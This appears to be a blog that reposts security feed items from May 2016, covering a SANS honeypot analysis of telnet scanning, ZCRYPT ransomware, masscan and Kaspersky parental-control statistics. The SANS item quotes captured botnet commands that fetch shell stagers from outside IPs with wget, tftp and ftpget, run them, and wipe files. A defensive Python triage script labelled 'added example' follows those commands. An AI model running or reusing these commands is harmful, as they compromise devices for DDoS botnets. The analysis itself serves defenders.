Tuesday, May 31, 2016

Feedly:Threats RSS Feed - Symantec Corp.. Exp.CVE-2015-2545



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Tuesday, May 31st 2016 http://ift.tt/1TPcU2E, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Ascesso!gm



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Threats RSS Feed - Symantec Corp.. Backdoor.Enfourks



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Shopperzads



from Threats RSS Feed - Symantec Corp.

Risk Level: Very Low. Type: Trojan.

Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. No warrant needed to get cell phone location: US court



from Security News - Software vulnerabilities, data leaks, malware, viruses

Police don't need a warrant to obtain mobile phone location data for a criminal investigation, a US appeals court ruled Tuesday in a case closely watched for digital-era privacy implications.

Feedly:Fortinet Blog | News and Threat Research - All Posts. How Secure is Your Company’s Financial Data?



from Fortinet Blog | News and Threat Research - All Posts

Businesses today face an ever-evolving threatscape with growing pressure to rethink security strategies for long-term sustainability. As a result, corporate finance teams are more actively partnering with IT to ensure the organization’s security strategies protect critical financial data. Fortinet’s Araldo Menegon discusses the issues and trends affecting corporate finance teams today.

Q&A with Araldo Menegon, Global Managing Director Financial Services at Fortinet

Isn’t security managed by corporate IT? Why do finance teams need to get involved?

Feedly:SANS Internet Storm Center, InfoCON: green. Increase in Port 23 (telnet) scanning, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

Some readers noted that over the weekend, port 23 scans were up significantly. I just took a quick look at our honeypot, and don't really see anything significantly different, other than the well known fact that if you run a telnet server with a default password, you are probably already compromised.

Typically, a sharp increase in the number of source IPs indicates some type of worm that uses vulnerable systems to scan for more victims after it infects them.

The main targets of telnet scans are usually embedded devices. The exploit follows a pretty simple pattern:

  1. Brute force the password (usually a well known default password).
  2. Download additional malware via ftp/http or tftp (typically multiple binaries for various architectures).
  3. Run the malware, which will typically set up a client for a DDoS botnet.

The malware is very ephemeral, with the distribution point often being shut down by the time it scans our honeypot. Here are a couple of results from our honeypot, and a few tricks about how to deal with lots of data in pcap files.

The first question is: Is this traffic spoofed? As a visual check, we compare the before and after distribution by /8 network. The image shows some deviations, but overall the graphs follow each other and there are no huge discrepancies in RFC1918 networks or other obviously spoofed networks.

For the honeypot, I set up a traffic capture that rotates into 100MB pcap files with tcpdump (tcpdump -w /tmp/telnet -C100 port 23). On this very busy honeypot (it covers several thousand IPs), it took about 15 minutes to fill 100MB.

Next, let's take a look at the telnet payloads with tshark:

tshark -r telnet -n -Y 'telnet.data && tcp.len>1' -T fields -e telnet.data | sort | uniq -c | sort -n

Here are some of the top commands:

------
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 93. 186.254.152 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 93. 186.254.152; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh

------

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://149 .56.110.173/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 149 .56.110.173;sh bin2.sh;busybox tftp 149 .56.110.173 -c get bin3.sh;sh bin3.sh;busybox ftpget 149 .56.110.173 bin4.sh;sh bin4.sh;exit

------

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 192 .227.221.223 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 192 .227.221.223; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;

------

cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://208 .67.1.114/rv.sh;sh rv.sh;busybox tftp -r rv1.sh -g 208 .67.1.114;sh rv1.sh;busybox tftp 208 .67.1.114 -c get rv2.sh;sh rv2.sh;busybox ftpget 208 .67.1.114 rv3.sh rv3.sh;sh rv3.sh;exit

------

As you can see, they all follow the standard "pattern".
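As an added example (not code from the diary or from the honeypot's own tooling), the following Python triages the telnet.data strings that the tshark pipeline above prints: it checks each one against the three-step pattern the diary describes (find a writable directory, fetch a stager via wget/tftp/ftp, run it) and collects the distribution hosts so a defender can feed them to an egress blocklist. The sample input is the four payloads quoted above, embedded as a constructed list with the diary's defanging spaces left in the IPs; the two benign commands are assumed for contrast.

```python
"""Triage of telnet honeypot payloads against the download-and-execute pattern.
Added example, not part of the ISC diary; SAMPLE_PAYLOADS is a constructed list."""
import re
from collections import Counter
from dataclasses import dataclass

SAMPLE_PAYLOADS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93. 186.254.152/bins.sh; "
    "chmod 777 bins.sh; sh bins.sh; tftp 93. 186.254.152 -c get tftp1.sh; chmod 777 tftp1.sh; "
    "sh tftp1.sh; tftp -r tftp2.sh -g 93. 186.254.152; chmod 777 tftp2.sh; sh tftp2.sh; "
    "rm -rf bins.sh tftp1.sh tftp2.sh",
    "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget "
    "http://149 .56.110.173/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 149 .56.110.173;"
    "sh bin2.sh;busybox tftp 149 .56.110.173 -c get bin3.sh;sh bin3.sh;busybox ftpget "
    "149 .56.110.173 bin4.sh;sh bin4.sh;exit",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192 .227.221.223/bins.sh; "
    "chmod 777 bins.sh; sh bins.sh; tftp 192 .227.221.223 -c get tftp1.sh; chmod 777 tftp1.sh; "
    "sh tftp1.sh; tftp -r tftp2.sh -g 192 .227.221.223; chmod 777 tftp2.sh; sh tftp2.sh; "
    "ftpget -v -u anonymous -p anonymous -P 21 192 .227.221.223 ftp1.sh ftp1.sh; sh ftp1.sh; "
    "rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *;",
    "cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget "
    "http://208 .67.1.114/rv.sh;sh rv.sh;busybox tftp -r rv1.sh -g 208 .67.1.114;sh rv1.sh;"
    "busybox tftp 208 .67.1.114 -c get rv2.sh;sh rv2.sh;busybox ftpget 208 .67.1.114 rv3.sh "
    "rv3.sh;sh rv3.sh;exit",
    "uname -a",            # constructed interactive commands that must not be flagged
    "cat /proc/cpuinfo",
]

FETCH_TOOLS = {"wget", "curl", "tftp", "ftpget", "ftp"}
# Dotted quad that tolerates the "93. 186.254.152" style defanging used in the diary text.
DOTTED_QUAD = re.compile(
    r"(?<![\w.])(\d{1,3})\s*\.\s*(\d{1,3})\s*\.\s*(\d{1,3})\s*\.\s*(\d{1,3})(?![\w.])")
STATEMENT_SPLIT = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")

@dataclass
class Triage:
    dir_fallbacks: int   # "cd A || cd B || ..." attempts to land in a writable directory
    fetch_tools: tuple   # download tools used, in order of first use
    hosts: tuple         # distribution hosts the stagers are pulled from
    chmods: int          # "chmod 777 x.sh" steps
    executes: int        # "sh x.sh" steps
    cleanup: bool        # "rm -f *" / "rm -rf ..." wiping the staging directory

    @property
    def is_downloader(self) -> bool:
        # The diary's pattern is: find a directory, fetch, run.  chmod and cleanup are
        # optional; the busybox variants skip chmod because "sh file" needs no +x bit.
        return self.dir_fallbacks >= 2 and bool(self.fetch_tools) and self.executes >= 1

def _command_word(stmt: str) -> str:
    words = stmt.split()
    if words and words[0] == "busybox" and len(words) > 1:  # "busybox wget ..." on embedded targets
        return words[1]
    return words[0] if words else ""

def extract_hosts(payload: str) -> tuple:
    """Distinct dotted-quad hosts in first-seen order, with defanging spaces removed."""
    seen = []
    for m in DOTTED_QUAD.finditer(payload):
        octets = [int(o) for o in m.groups()]
        host = ".".join(str(o) for o in octets)
        if all(o <= 255 for o in octets) and host not in seen:
            seen.append(host)
    return tuple(seen)

def triage(payload: str) -> Triage:
    """Break one telnet.data string into shell statements and score the pattern steps."""
    stmts = [s for s in STATEMENT_SPLIT.split(payload.strip()) if s]
    cmds = [_command_word(s) for s in stmts]
    tools = []
    for c in cmds:
        if c in FETCH_TOOLS and c not in tools:
            tools.append(c)
    return Triage(
        dir_fallbacks=cmds.count("cd"),
        fetch_tools=tuple(tools),
        hosts=extract_hosts(payload),
        chmods=cmds.count("chmod"),
        executes=sum(1 for s, c in zip(stmts, cmds) if c == "sh" and len(s.split()) == 2),
        cleanup="rm" in cmds,
    )

def summarize(payloads):
    """Aggregate a capture the way `sort | uniq -c` does, plus per-host session counts."""
    unique = Counter(payloads)          # identical payloads replayed by many infected bots
    hosts = Counter()
    downloader_sessions = 0
    for payload, n in unique.items():
        t = triage(payload)
        if t.is_downloader:
            downloader_sessions += n
            for h in t.hosts:
                hosts[h] += n
    return {"sessions": len(payloads), "unique_payloads": len(unique),
            "downloader_sessions": downloader_sessions, "hosts": hosts}

if __name__ == "__main__":
    print(summarize(SAMPLE_PAYLOADS))
```

To run it on a real capture, feed the lines printed by the tshark command above into summarize() instead of SAMPLE_PAYLOADS; the hosts Counter is the list to block or pivot on, not the volume of scanning sources.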

p0f can give us a quick breakdown of operating systems for the collected traffic. Pretty much all of the hits come from Linux. Out of about 1 million p0f records, fewer than 200 indicate an operating system other than Linux.

So in conclusion: Not sure what causes the significant increase, but I doubt that it is anything fundamentally different from what we have seen before. Keep your telnet servers contained (or turned off) and don't use default passwords.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Feedly:Threats RSS Feed - Symantec Corp.. WSH.Downloader



from Threats RSS Feed - Symantec Corp.

Discovered:
May 31, 2016
Updated:
May 31, 2016 11:35:23 AM
Type:
Trojan
Systems Affected:
Windows 2000, Windows 7, Windows 8, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

WSH.Downloader is a Trojan horse that downloads a malicious file to the compromised computer.

Antivirus Protection Dates

  • Initial Rapid Release version May 31, 2016
  • Latest Rapid Release version May 31, 2016
  • Initial Daily Certified version May 31, 2016
  • Latest Daily Certified version May 31, 2016
  • Initial Weekly Certified release date June 1, 2016

Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.

Writeup By: Hector Navarro Martín

Feedly:Security News - Software vulnerabilities, data leaks, malware, viruses. Researchers uncover extensive Twitter-based cyber espionage campaign targeting UAE dissidents, journalists



from Security News - Software vulnerabilities, data leaks, malware, viruses

A new report from the University of Toronto's Citizen Lab reveals a sophisticated international cyber-espionage campaign targeting journalists and activists whose work concerns the United Arab Emirates. The campaign used elaborate ruses, including fake organizations and journalists, to engage targets online, then entice them to open malicious files and links containing malware capable of monitoring their activities.

Feedly:Security Intelligence | TrendLab.... Crypto-ransomware Attacks Windows 7 and Later, Scraps Backward Compatibility



from Security Intelligence | TrendLab...

Crypto-ransomware Attacks Windows 7 and Later, Scraps Backward Compatibility

How do you know that something has become very popular? Simple – when poorly-made knockoff versions start to hit the marketplace. Ransomware, it seems, has hit that point.

The writers behind the new ZCRYPT ransomware family have either scrapped support for Windows XP, or did a sloppy job in creating it. This new family only targets systems with newer versions of Windows, specifically Windows 7 and later. Is ZCRYPT deliberately cutting off older operating systems, or is it just poorly-written malware?

Exclusive Crypto-ransomware

When we came across ZCRYPT it first appeared to be a fairly nondescript threat. It encrypts the user’s files and uses the .ZCRYPT extension as its marker. It is capable of encrypting the following file formats:

.zip, .mp4, .avi, .wmv, .swf, .pdf, .sql, .txt, .jpeg, .jpg, .png, .bmp, .psd, .doc, .docx, .rtf, .xls, .xlsx, .odt, .ppt, .pptx, .xml, .cpp, .php, .aspx, .html, .mdb, .3fr, .accdb, .arw, .bay, .cdr, .cer, .cr2, .crt, .crw, .dbf, .dcr, .der, .dng, .dwg, .dxg, .eps, .erf, .indd, .kdc, .mdf, .mef, .nrw, .odb, .odp, .ods, .orf, .p12, .p7b, .p7c, .pdd, .pef, .pem, .pfx, .pst, .ptx, .r3d, .raf, .raw, .rw2, .rwl, .srf, .srw, .wb2, .wpd, .tar, .jsp, .mpeg, .msg, .log, .cgi, .jar, .class, .java, .bak, .pdb, .apk, .sav, .tar.gz, .emlx, .vcf

It makes the usual threats of deleting the files if the victim doesn’t pay up within a week. Ransom is set at 1.2 BTC (approximately 500 US dollars), with the ransom going up to 5 BTC (approximately 2,200 US dollars) after four days. The ransom note looks like this:

Figure 1. Ransom note (Click to enlarge)

However, what it can do on systems running Windows 7 and later, it can only attempt on other systems. According to our analysis, it fails to either encrypt the files properly or display the ransom note when launched in an older version of Windows, such as Windows XP. The malware calls a function which does not exist in earlier versions of Windows; this breaks it for the older operating systems.

Interestingly, this particular family also tried to spread via USB flash disks: it plants a copy of itself onto removable drives. This is relatively unusual in crypto-ransomware; back in December of 2013 we identified a CryptoLocker variant which behaved similarly. It never seems to have caught on, however. Crypto-ransomware authors seem to be satisfied with distributing their wares via the most common means: malvertising and spam.

C&C Servers

The domain name of the command-and-control (C&C) server was poiuytrewq.ml, a reversal of qwertyuiop. This is the top alphabetical row on a standard QWERTY keyboard. The top-level domain .ml is assigned to Mali; registrations for domains under this TLD were given away for free starting in April 2013. (URLs that hosted ZCRYPT variants were also hosted on .ml domains.)

The threat actor also enjoyed free anonymity because the domain registration masked the registrant’s actual identity. The C&C domain is already tagged “canceled, suspended, refused, or reserved”.

Industry Practices

Backing up is still the best defense against crypto-ransomware; the 3-2-1 rule ensures that users still have a copy of their data even if they are affected by similar threats. We strongly advise against paying the ransom; this only ensures that the threat will continue to become bigger and bigger.

Trend Micro says NO to ransomware. We strongly advise users not to pay ransom demands as it fuels cybercrime and promotes further propagation of ransomware.

Trend Micro Solutions

Trend Micro offers different solutions to protect enterprises, small businesses, and home users to help minimize the risk of getting affected by crypto-ransomware, such as ZCRYPT.

Enterprises can benefit from a multi-layered, step-by-step approach in order to best mitigate the risks brought by these threats. Email and web gateway solutions such as Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security prevent ransomware from ever reaching end users. At the endpoint level, Trend Micro Smart Protection Suites deliver several capabilities like behavior monitoring and application control, and vulnerability shielding that minimize the impact of this threat. Trend Micro Deep Discovery Inspector detects and blocks ransomware on networks, while Trend Micro Deep Security™ stops ransomware from reaching enterprise servers, whether physical, virtual or in the cloud.

For small businesses, Trend Micro Worry-Free Services Advanced offers cloud-based email gateway security through Hosted Email Security. Its endpoint protection also delivers several capabilities such as behavior monitoring and real-time web reputation in order to detect and block ransomware.

For home users, Trend Micro Security 10 provides robust protection against ransomware, by blocking malicious websites, emails, and files associated with this threat.

Users can likewise take advantage of our free tools such as the Trend Micro Lock Screen Ransomware Tool, which is designed to detect and remove screen-locker ransomware; as well as Trend Micro Crypto-Ransomware File Decryptor Tool, which can decrypt certain variants of crypto-ransomware without paying the ransom or the use of the decryption key.

TippingPoint customers will be protected from attacks involving this threat with the following ThreatDV filter that will be made available on May 31:

  • 24733: HTTP: Ransom_ZCRYPT.A

Related hashes:

D14954A7B9E0C778909FE8DCAD99AD4120365B2E – Ransom_ZCRYPT.A

With additional analysis from Rhena Inocencio, Jay Yaneza, and Ruby Santos.

Feedly:Darknet – The Darkside. Wfuzz – Web Application Brute Forcer

Feedly:Errata Security. From scratch: why these mass scans are important



from Errata Security

The way the Internet works is that "packets" are sent to an "address". It's the same principle how we send envelopes through the mail. Just put an address on it, hand it to the nearest "router", and the packet will get forwarded hop-to-hop through the Internet in the direction of the destination.

What you see as the address at the top of your web browser, like "www.google.com" or "facebook.com" is not the actual address. Instead, the real address is a number. In much the same way a phonebook (or contact list) translates a person's name to their phone number, there is a similar system that translates Internet names to Internet addresses.

There are only 4 billion Internet addresses. It's a number between 0 and 4,294,967,296. In binary, it's 32 bits in size, which comes out to roughly 4 billion combinations.

For no good reason, early Internet pioneers split up that 32-bit number into four 8-bit numbers, each of which has 256 combinations (256 × 256 × 256 × 256 = 4294967296). That is why Internet addresses are written like "192.168.38.28" or "10.0.0.1".

Yes, as you astutely point out, there are many more than 4 billion devices on the Internet (the number is closer to around 10 billion). What happens is that we can use address sharing (also called "network address translation"), so that many devices can share a single Internet address. All the devices in your home (laptop, iPad, Nest thermostat, WiFi-enabled Barbie, etc.) have a unique address that only works in the home. When the packets go through your home router to the Internet, they get changed so that they all come from the same Internet address.

This sharing only works when the device is what's called a "client", which consumes stuff on the Internet (like watching video, reading webpages), but which doesn't provide anything to the Internet. Your iPad reaches out to the Internet, but in general nothing on the Internet is trying to reach your iPad. Sure, I can make a Facetime video call to your iPad, but that's because both of us are clients of Apple's corporate computers.

The opposite of a client is a "server". These are the computers that provide things to the Internet. These are the things you are trying to reach. There are web servers, email servers, chat servers, and so on. When you hear about Apple or Facebook building a huge "data center" somewhere, it's just a big building full of servers.

A single computer can provide many services. They are distinguished by a number between 0 and 65,535 (a 16-bit number). Different services tend to run on "well known" ports. The well known port for encrypted web servers is 443 (no, there's no good reason that number out of 65535 combinations was chosen, it's not otherwise meaningful). Non-encrypted web-servers are at port 80, by the way, but all servers by now should be encrypted.

Web links like "http://ift.tt/gmvlld" must contain the port number. However, if you are using the default, then you can omit it, so "https://www.google.com" is just fine. However, any other port must be specified, such as "http://ift.tt/1TUwLeR". When you visit such links within your browser, it'll translate the name into an Internet address, then send packets to the combination address:port.

Normally, when you look for things on the web, you use a search engine like Google to find things. Google works by "spidering" the Internet, reading pages, then following links to other pages. After I post this blog post, Google is going to add "http://ift.tt/1TUwLeR" to its index and try to read that webpage. It doesn't exist, but Google will think it does, because it reads this page and follows the link.

There is an idea called the "Dark Internet" which consists of everything Google can't find. Google finds only web pages. It doesn't find all the other services on the Internet. It doesn't find anything not already linked somewhere on the web.

And that's where my program "masscan" comes into play. It searches for "Dark Internet" services that aren't findable in Google. It does this by sending a packet to every machine on the Internet.

In other words, if I wanted to find every (encrypted) web server on the Internet, I would blast out 4 billion packets, one to each address at port 443. I would then listen for reply packets. All valid acknowledgements mean there's a computer with that address running such a service. When I do this, I get about 30 million responses, by the way. A single web server can host many websites, the actual number of websites is more like a billion.

Such a scan is possible because even though it takes 4 billion packets to do this, networks are really fast. A gigabit network connection, such as the type Google Fiber might provide you, can transmit packets at the rate of 1 million per second. That means, in order to scan the entire Internet, I'd only need 4 thousand seconds, or about an hour.

People get mad when I scan this fast, especially those with large networks who see a flood of packets from me in an hour. Therefore I usually scan slower, at only 125,000 packets per second, which takes about 10 hours to complete a scan.

Two years ago a bug in encrypted web services was found, called "Heartbleed". How important a bug was it? Well, with masscan, I can easily send a packet to all 4 billion addresses, and test them to see if they are vulnerable. The last time I did this, I found about 300,000 servers still vulnerable to the bug.

Right at the moment, I'm doing a much more expansive scan. Instead of scanning for a single port, I'm scanning for all possible ports (all 65536 of them). That's a huge scan that would take 50 years at my current rate, or 5 years if I run at maximum speed on my Internet link. I don't plan on finishing the scan, but stopping it after a couple weeks, as sort of a random sample of services on the Internet.


One finding I have is a service called "SSH". It's a popular service that administrators (the computer professionals who maintain computers) use to connect to servers to control them. Normally, it uses port 22. Consider the output of my full scan below:


What you see is that I'm finding SSH on all sorts of ports. For every time somebody put SSH on the expected port of 22, roughly 15 people have decided to change the port and put it somewhere else.

There are two reasons they might do so. The first is because of a belief in the fallacy of security through obscurity, that if they choose some random number other than 22, then hackers won't find it. That's likely the case where we see old versions of SSH in the above picture, such as version 1.5 instead of the newer 2.0.

The other reason, though, is simply to avoid the noise of the Internet. Hackers are constantly scanning the Internet for SSH on port 22, and once they find it, start "grinding" passwords, trying password after password until they find one that works. This fills up log files and annoys people, so they put their services on other ports.

Note in the above picture two entries where Internet addresses starting with 121.209.84.x have SSH running at port 5000. Looking on the Internet, it seems these addresses belong to Telstra. It seems they have some standard policy of putting SSH on port 5000. If you were a hacker wanting to break into Telstra, that sort of information would be useful to you. That's the reason for doing this scan. I'm not going to grab all address:port combinations, but enough where I can start finding patterns.


Another thing I've found relates to something called VNC. It allows one computer to connect to the screen of another computer, so that you can see their desktop. It normally runs at port 5900. When you masscan the entire Internet for that port, you'll find lots of cases where people have the VNC service installed on their computer and exposed to the Internet, but without a password. This article describes some of the fun things we find in these searches, from toilets, to power plants, to people's Windows desktops, to Korean advertising signs.

But this full scan finds VNC running at other ports, as shown in the following picture.


For everybody running VNC on the standard port, it appears about 5 to 10 people are running it on some other random port. A full scan of the Internet, on all ports, would find a much richer set of VNC servers.

Conclusion

I tweet my research stuff often, but it's often inscrutable, since you are supposed to know things like VNC, SSH, and random/standard port numbers, which even among techies isn't all that common. In this post, I tried to describe from scratch the implications of the sorts of things I'm finding.


Monday, May 30, 2016

Feedly:SANS Internet Storm Center, InfoCON: green. ISC Stormcast For Tuesday, May 31st 2016 http://ift.tt/1XKoICx, (Tue, May 31st)



from SANS Internet Storm Center, InfoCON: green

Feedly:Threats RSS Feed - Symantec Corp.. Trojan.Incompat



from Threats RSS Feed - Symantec Corp.

Threat Spotlight: Trojan.Cryptowall

Trojan.Cryptowall is a Trojan horse that encrypts files on the compromised computer. It then asks the user to pay to have the files decrypted.

The threat typically arrives on the affected computer through spam emails, exploit kits hosted through malicious ads or compromised sites, or other malware.

Once the Trojan is executed on the compromised computer, it creates a number of registry entries to store the path of the encrypted files and run every time the computer restarts. It encrypts files with particular extensions on the computer and creates additional files with instructions on how to obtain the decryption key.

This threat family attempts to convince the user to pay money in order to get the key to unlock their files. It uses a variety of different techniques in order to encourage the user to pay the ransom.

More information on Trojan.Cryptowall is available in the threat family writeup.

Feedly:We Live Security. 65 million Tumblr users should probably be careful…



from We Live Security

65 million Tumblr users have had their details compromised as a result of a recently-discovered breach dating back to 2013. But it's not just their passwords that they should be concerned about.

Feedly:Securelist / All Updates. Small users in a big network



from Securelist / All Updates

Children use the Internet for schoolwork, socializing, watching films and cartoons, playing games and much more. But, as we all know, browsing the web can be an unsafe business. In order to control their children’s online activity many parents use specialized software – so-called parental control.

This software is usually capable of controlling the amount of time a child spends online or using the computer, which apps can be launched and what personal data can be disclosed. One of the most important features of a parental control product, however, is the ability to restrict access to web resources containing undesirable content.

This article examines the statistics of visits by children to websites with specific categories of content. For this we will use Kaspersky Security Network (KSN) statistics based on notifications by the Parental Control module in Kaspersky Lab products. These statistics will allow us to estimate which categories of undesirable websites children visit most often.

How the statistics are collected

Kaspersky Lab’s Parental Control module scans the content of the webpage that a child is trying to visit. If the site belongs to one of the 14 categories listed in the module, it notifies KSN (no personal data is involved and the user’s confidentiality is respected).

Access to that webpage is only denied if the parents have selected the appropriate category in the product settings. The statistics are collected anonymously, regardless of whether the parents have selected the appropriate category (i.e., whether or not that category is blocked by Parental Control).

It should be noted that these statistics do not include mobile device statistics.

At the current time, web filtration is carried out for the following content categories:

We selected the first 12 categories for analysis. We decided to omit “Religion” and “News media” as these categories were only introduced recently and sufficient statistics have not yet been collected.

The global picture

First of all, let’s look at the global statistics.

Distribution of Parental Control notifications between the 12 website categories globally, April 2015 – April 2016.

We can see from this diagram that children around the world spend most time on social networking sites and instant messengers, playing computer games, and, while online, repeatedly encounter the themes of alcohol, tobacco and drugs. Less frequently, children and teenagers visit online stores, watch videos and listen to music online, sometimes encounter obscene language and occasionally visit (perhaps accidentally) porn sites.

These are the average statistics for the entire world. But are they the same for all regions or countries? It turns out that they aren’t.

Regional differences

For our comparison, we selected the top five website categories from the global ranking and looked at how they differed across five regions:

  • North America (US and Canada)
  • Western Europe (Austria, Belgium, UK, Germany, Denmark, Ireland, Spain, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, France, Switzerland, Sweden)
  • CIS (Russia, Kazakhstan, Belarus, Ukraine)
  • Latin America (Argentina, Brazil, Mexico)
  • Far East (China, Singapore, Hong Kong, Macao, Taiwan, Japan, South Korea).

The results of the comparison are shown below:

Proportion of Parental Control notifications for Top 5 categories in different regions

In North America, children visit social media websites, use instant messaging systems, chats and forums less frequently than the world average, although they show more interest in computer games, alcohol and online shopping.

The situation in Western Europe is very similar to that in North America.

In the CIS, children and teenagers are less interested in online shopping than in other regions.

In Latin America, as well as in the CIS, Internet communication media are very popular with kids and teens, while computer games are played less frequently than in other regions.

The situation is different in the Far East. Social networks are almost as popular there as they are in western countries, but kids and teens don’t spend as much time playing online computer games (which may be due to the popularity of game consoles). Instead, they spend more time visiting online shops, such as the Japanese Rakuten, amazon.co.jp, Uniqlo, and Taobao in China.

Differences between countries

We found that even between countries within the same region there are differences in the popularity of the website categories. For the purposes of comparing the situations in different countries, we added the “Adult content” category to the top five. Let’s begin with that category.

Adult content

When we speak of children’s safety online, it’s impossible to avoid the topic of pornography – this is the worst nightmare for millions of parents. For quite some time, this category was at the top of the ratings, but we now have some good news! According to Kaspersky Lab’s Parental Control statistics, children from around the world are visiting pornographic and erotic websites, adult dating sites and online sex shops less and less.

Popularity of the “Adult content” category around the world, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control module statistics

However, we cannot rule out the possibility that children visit adult content websites from their mobile devices: for them, it is easier to watch porn on their phone, with no parental control tools installed, than it is on a computer that is closely watched by their parents.

Children in China show the most interest in adult content sites. Children in the UK, US and Russia visit such sites less often.

Popularity of the “Adult content” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control module statistics

According to Kaspersky Lab’s Parental Control statistics, the adult content website www.xvideos[.]com is the most popular in all regions. If the Parental Control module is configured to block access to adult content sites, then a child’s attempt to visit this site will finish with a warning screen being displayed. It should be noted that Safe Kids, Kaspersky Lab’s new product, works on mobile devices as well:

Safe Kids notification on a mobile device

If you want to reliably safeguard your child from adult content, make sure you block this category in the parental control module.

Internet Communication media

67% of all visits were to websites belonging to the “Internet communication media” category, which includes social networks, instant messengers, chats and forums.

Unsurprisingly, social networks are the most popular sites with children throughout the world – these sites allow them to talk to their friends, keep a kind of diary, share photos and videos, as well as shop online, play games, and watch cartoons or films. As well as all that, there is a lot of content that children shouldn’t be seeing: on some social networks you can find pornography or purchase drugs.

The most frequently visited sites in this category are Facebook, Twitter, YouTube and Pinterest. To a lesser extent children also visit Instagram and the web-based version of the WhatsApp messenger.

According to KSN data, over the last year and a half children and teenagers have been spending less time chatting with their friends online from their computers.

Popularity of the “Internet communication media” category worldwide, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control statistics

We presume that this is due to the growing popularity of mobile Internet. Today, mobile devices are being used more and more for online communications, especially in developed countries. This is beyond the scope of this analysis, however, as we are looking at the statistics of Parental Control module detections on computers; these statistics don’t take into account how many times a day children and teenagers visit their social media accounts from mobile devices. Also, IM services such as Telegram or Viber are primarily accessed from mobile devices. In other words, children, and especially teenagers, are far more active than these statistics suggest when it comes to both types of online communications (i.e. mobile- and computer-based).

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Internet communication media are most popular in Mexico, Brazil, Russia and Italy, and least popular in China, Germany and the UK.

We presume that for China, this is due to the state’s Internet censorship practices, while in Germany and the UK it is related to the widespread use of mobile technologies and smartphones in the everyday lives of schoolchildren.

This is all well and good – technologies make our world more convenient, and talking to someone face-to-face on the other side of the planet can seem like magic! But any magic has a dark side to it. Child molesters, fraudsters, trolls, perverts and other nefarious characters can spoil the life of a child or teenager who doesn’t stick to the rules of conduct on social networks. Read more here about how children and teenagers should behave on the social networks to protect themselves from malicious users.

Computer games

Children have always played games. However, in recent decades real-life games have been almost completely superseded by computer games.

Today’s computer games are products of advanced technologies; they are realistic, social, absorbing, spectacular creations by designers and script writers. It comes as little surprise that gaming sites around the world come second in terms of popularity among children and teenagers.

Popularity of the “Computer games” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Computer games are least popular in Japan, Italy and Mexico. However, in these countries there are different reasons for this. Game consoles such as Sony PlayStation and Nintendo are widespread in Japan, where they are manufactured. In Mexico and Italy, judging by our statistics, kids and teens simply prefer social networks to computer games.

Steam is one of the gaming sites most often visited by children and teenagers. It is in fact more than a mere online gaming store – it is a large gaming community where kids and teens can talk to fellow gamers, find new friends, read news and, naturally, purchase games and share their in-game achievements.

Steam’s homepage

As can be seen in the statistics of websites visited by children, Minecraft is another gaming website that children and teens often visit. Minecraft can be seen as an educational (edutainment) game, and in some countries it is even part of the school curriculum, within the framework of the MinecraftEdu project.

The time your child spends playing computer games needs to be regulated. Overindulging in games can lead to dependence. This is especially relevant for so-called infinite games, which are not tied to a single plot and have no beginning or end. Massively multiplayer online role-playing games (MMORPGs) fall into this category. There are known cases where overuse of MMORPGs has led to psychological harm, gaming addiction and even death from exhaustion.

Parents should also take note of what games their child is playing, the age ratings and the contents of the game, as well as the kind of skills they develop.

Computer games are not bad, but it’s better for children to spend their time productively.

Alcohol, tobacco, narcotics

The popularity of websites in the “Alcohol, tobacco, narcotics” category came as a bit of a surprise. Children in Germany (22.79%) and the UK (25.37%) show the most interest in this topic.

Popularity of the “Alcohol, tobacco and narcotics” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

However, a child can encounter this topic just about anywhere on the Internet. For example, in all types of teenager blogs it is not uncommon to see a picture of a girl with a bong, or pictures glorifying vodka.

Publications in social media promoting the consumption of alcohol, tobacco or drugs

Similar messages often occur on different entertainment sites, such as 9gag.

Images published on the website 9gag

